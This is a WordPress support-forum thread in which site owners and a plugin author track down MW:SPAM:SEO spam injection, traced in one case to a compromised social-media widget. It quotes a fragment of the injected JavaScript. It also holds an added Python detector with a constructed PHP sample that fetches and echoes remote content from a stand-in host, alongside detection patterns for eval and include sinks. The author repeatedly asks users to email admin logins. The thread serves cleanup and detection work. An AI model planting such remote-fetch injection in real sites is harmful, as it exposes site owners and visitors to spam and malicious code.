Anti-Malware (Get Off Malicious Scripts)
[resolved] Can't remove MW:SPAM:SEO (27 posts)

  1. ziggynerja1
    Member
    Posted 1 year ago #

    Hi there, Sucuri has detected the known malware MW:SPAM:SEO on our website. We ran the plugin and removed a number of threats within the kses.php file. However, we are still receiving ads all over our website, and Sucuri is picking up the same threats.

    What can I do to get the issues resolved? I'm not sure if it could be a bad plugin, or corrupted FTP password? I'd really appreciate your help, and be happy to donate.

    Thank you!

    http://wordpress.org/extend/plugins/gotmls/

  2. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    I doubt it's your FTP password but it never hurts to change a password
    (unless you forget what you changed it to ;-)

    Assuming you have updated the definitions and scanned the whole site with my plugin then I would say you probably have a new threat that my plugin is not aware of. The next step, if you are willing, is to give me access to your WP Admin and I will find this new threat and define it so that it can be automatically removed by my plugin.

    If you want to send me a login you can email me directly: eli at gotmls.net

  3. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    Hey Jack,
    Just following up to make sure your site is staying clean. You haven't had that virus come back, have you?

    Let me know if you need any more help.

    Aloha, Eli

  4. Denis Ciumbargi
    Member
    Posted 1 year ago #

    My site is infected now with same thing.

    I just installed the plugin, hope it will solve things up.

    Any instructions for a better scan in case the scan misses things?

    Sucuri provided several links that have been infected already; from 2 it has now spread to 8 links.

  5. Denis Ciumbargi
    Member
    Posted 1 year ago #

    Worked nicely, scanned, found, fixed. Thank you!

  6. majalla
    Member
    Posted 1 year ago #

    Hi,

    I have just installed your scanner in one of my test sites, (www.majalla.eu), and it did scan, but it did not find the "MW:SPAM:SEO" code. I still have them on the site, and I have checked almost all the files but cannot find the location of these codes...

    Below are the Sucuri scanner's results ...

    ===
    url: http://sitecheck.sucuri.net/results/majalla.eu

    web site: majalla.eu
    status: Site infected with malware
    web trust: Not Blacklisted
    *Cached results from the last 24 hrs.

    Malware found in the URL: http://www.majalla.eu/
    Known javascript malware.
    Details: http://sucuri.net/malware/entry/MW:SPAM:SEO
    t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();

    Malware found in the URL: http://www.majalla.eu/404testpage4525d2fdc
    Known javascript malware.
    Details: http://sucuri.net/malware/entry/MW:SPAM:SEO
    t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();

    Malware found in the URL: http://www.majalla.eu/404javascript.js
    Known javascript malware.
    Details: http://sucuri.net/malware/entry/MW:SPAM:SEO
    t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();

    Malware found in the URL: http://www.majalla.eu/about-us
    Known javascript malware.
    Details: http://sucuri.net/malware/entry/MW:SPAM:SEO
    t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();

    Malware found in the URL: http://www.majalla.eu/writers
    Known javascript malware.
    Details: http://sucuri.net/malware/entry/MW:SPAM:SEO
    t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();

    Malware found in the URL: http://www.majalla.eu/submissions
    Known javascript malware.
    Details: http://sucuri.net/malware/entry/MW:SPAM:SEO
    t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();

    Malware found in the URL: http://www.majalla.eu/category/turkey-news
    Known javascript malware.
    Details: http://sucuri.net/malware/entry/MW:SPAM:SEO
    t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();

    ===

    Based on the Sucuri results, when I check the ViewSource for the home page for example, and on the ViewSource I search for the above code snippets, I can easily find that in the Source, but cannot find it in any files...

    ===

    [Code moderated. Please do not post hack code blocks in the forums. Please use the pastebin]

    ===

    Can you kindly get the above located and cleaned ASAP ...

    Thanking you,

    Best regards,

    Fawaz

  7. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    Majalla,
    It looks like you have already removed this threat. I just helped someone else remove it too. It was in the social-media-widget plugin. Is that where you found it too?

    It would help me to add a definition for it if you were able to send me the code you removed from that file. Can you contact me and let me know what you found?

    Thanks, Eli

  8. majalla
    Member
    Posted 1 year ago #

    Hi Eli,

    Yes, you are right. Your Malware Tool is great, but unfortunately it did not have the definitions I guess and did not do much good. But some of our great friends from WP Camp helped point me in the right direction. Dave from LA Marketing was able to identify the culprit in the "Social Media Widget" plugin. Simply updating the plugin was able to resolve the issue.

    Yes, I downloaded the full site yesterday to review the files before updating the plugin. I got the file ... "social-widget.php" ... seems it was trying to connect to a URL and fetching a file named "c.php" and imploding it ...

    === The Script is as below ===

    [Code moderated. Please do not post hack code blocks in the forums. Please use the pastebin]

    Hope this helps ...

    For more help pls. feel free to contact Dave who was the original genius who helped identify this from LA Marketing ...

    Thanks and Regards,

    Fawaz
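
    Post 8 describes social-widget.php fetching a remote c.php and imploding it, which is consistent with post 6 seeing the snippet in View Source but not in any file on disk. As an added example (not code from the thread, the plugin, or its author; the sample PHP, its URL and function names are constructed), this Python script flags PHP lines that load a literal remote URL and output or execute the result within a few lines:

```python
import re
from pathlib import Path

# PHP calls that can read from a URL, given a literal http(s) string argument.
# Assumption: the URL is a plain literal; encoded or concatenated URLs are missed.
FETCH = re.compile(
    r"\b(?:file_get_contents|file|fopen|curl_init|wp_remote_get)\s*\(\s*"
    r"['\"](https?://[^'\"]+)['\"]", re.I)
# Sinks that turn fetched data into page output or executed code.
SINK = re.compile(r"\b(?:implode|echo|print|eval|include|require)(?:_once)?\b", re.I)
WINDOW = 5  # lines after the fetch in which a sink counts as related


def scan_php_source(text):
    """Return [(line_no, url, sinks)] for remote fetches followed by a sink."""
    lines = text.splitlines()
    findings = []
    for i, line in enumerate(lines):
        m = FETCH.search(line)
        if not m:
            continue
        nearby = "\n".join(lines[i:i + WINDOW + 1])
        sinks = sorted({s.lower() for s in SINK.findall(nearby)})
        if sinks:
            findings.append((i + 1, m.group(1), sinks))
    return findings


def scan_tree(root):
    """Scan every .php file under root; return {path: findings} for hits only."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_php_source(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report


# Constructed sample: stands in for the moderated code, which is not on the page.
SAMPLE_INFECTED = '''<?php
// constructed sample for illustration
function social_widget_footer() {
    $lines = @file("http://example.invalid/c.php");
    if ($lines) {
        echo implode("", $lines);
    }
}
'''

if __name__ == "__main__":
    for line_no, url, sinks in scan_php_source(SAMPLE_INFECTED):
        print(f"line {line_no}: fetches {url}, then {', '.join(sinks)}")
```

    Run `scan_tree()` against a downloaded copy of wp-content and review each hit by hand; legitimate plugins also fetch remote data, so a hit is a lead, not a verdict.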

  9. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    Thanks Majalla,
    I have added this new threat to my Definition Update so it can now be repaired automatically with my Anti-Malware.

    I really appreciate your help in identifying this new threat.

    Aloha, Eli

  10. zahweb
    Member
    Posted 1 year ago #

    I also ran Sucuri and it detected MW:SPAM:SEO. But running the scanner did not detect it on my site. Am I doing something wrong?

  11. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    zahweb,
    You might have a new variant of this threat that has not yet been identified in my Definition Updates. If you are willing to let me into your WP Admin I will track it down and add it to my definitions so that it can be automatically removed.

    You can send login credentials directly to my email: eli at gotmls dot net
    Don't post them here ;-)

    Aloha, Eli

  12. zahweb
    Member
    Posted 1 year ago #

    Just sent to you, if you can update thanks.

  13. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    zahweb,
    I see you have restored your site and the ad link injected on your homepage is gone. That's good but we didn't figure out where it was coming from so it could come back if your server still has the same vulnerability that let it in the first time. If you do get re-infected consider my offer to copy your site to my server for further testing.

    Aloha, Eli

  14. FrankJames
    Member
    Posted 11 months ago #

    Aloha

    I have the same issue as zahweb. The plugin cannot find MW:SPAM:SEO as detected by Sucuri.

    Was a cure found? I would be willing to assist in its demise. What can I do? How can I find this damn thing?

    Thanks
    Frank

  15. Eli
    Member
    Plugin Author

    Posted 11 months ago #

    MW:SPAM:SEO is a very generic definition. There are lots of threats that my plugin will find and fix that fall under that description. There are also always new threats coming out that my plugin cannot always identify and automatically fix until I add them to my definition update.

    If you are willing to give me a WP Admin login to your site I will look for this new threat and add it to my definition update so that it can be automatically removed.

    You can email me directly at: eli AT gotmls DOT net

    Aloha, Eli

  16. FrankJames
    Member
    Posted 11 months ago #

    Eli,

    I found the code in the theme header.php file. I sent it to you. Please add it to your definitions. I will wait to remove it so I can test your plugin.

    Thanks
    Frank

  17. Eli
    Member
    Plugin Author

    Posted 11 months ago #

    FrankJames,
    I have not received any emails from you. Maybe it's getting blocked because of the malicious content. Check the address you sent it to and maybe try just sending me a test message to make sure I get it.

    Also, if you have a place that you can post or upload the code to then you can send me a link to it or post the link here.

    Thanks for working with me to update definition. I will add this code as soon as I get it so that you can test it right away.

    Aloha, Eli

  18. FrankJames
    Member
    Posted 11 months ago #

  19. Eli
    Member
    Plugin Author

    Posted 11 months ago #

    Aloha FrankJames,
    Thank you so much for posting that code. I have added it to my definitions update so that it can be automatically removed. I have only tested this one on my own test servers by infecting a few of my testing sites with the code you posted. Please download my latest definition update and make sure it works on your live infection.

    Mahalo nui, Eli

  20. livingonbeans
    Member
    Posted 10 months ago #

    Hi,

    I have the same issue, specifically spam messages when posting a link on facebook, does anyone have an idea what this could be, the plugin didn't seem to find it.
    Thanks,
    Danny
    http://www.livingonbeans.com

  21. Eli
    Member
    Plugin Author

    Posted 10 months ago #

    Danny,
    I replied to your post on my forum too. Here is what I said:
    Have you already removed some threats from your site? Because Facebook actually caches your site, it may take a little while before your post looks clean.
    If you have not found anything wrong on the site yet and you need my help to locate the malicious code just send me your WP Admin login and I’ll take a look.

    Aloha, Eli

  22. fifer1863
    Member
    Posted 10 months ago #

    Having similar issue. Sucuri is saying MW:SPAM:SEO threat. I have run complete scans of everything but cannot locate the threat.

    Jim
    http://www.jimbeeghley.com

  23. WPyogi
    Volunteer Moderator
    Posted 10 months ago #

    @fifer1863 - please start your own thread - "similar" is not the same and this thread is outdated and already marked resolved.

  24. guestmm
    Member
    Posted 8 months ago #

    similar
    Hello, I installed the plugin but no files were found to be bad. But I still have the problem.

    site: http://www.ashleyrobertsonline.com/main/

  25. Eli
    Member
    Plugin Author

    Posted 8 months ago #

    This is probably a new threat. I would be happy to help you find it and add it to my definition update so that it can be automatically removed, but please don't post anymore on this thread. As WPyogi said "this thread is outdated and already marked resolved". It is better to contact me on my own site gotmls.net or at least start a new thread here on wordpress.org.

    If you want me to look at your specific issue you will need to send your WP Admin credentials directly to me: eli AT gotmls DOT net

    Aloha, Eli

  26. r_magowan
    Member
    Posted 8 months ago #

    Hi there,
    Can you let me know the name of your plugin that can remove this MW:SPAM:SEO malware?
    Thanks.

  27. Eli
    Member
    Plugin Author

    Posted 8 months ago #

    It's tagged at the top of this thread:
    Anti-Malware (Get Off Malicious Scripts)

Topic Closed

This topic has been closed to new replies.
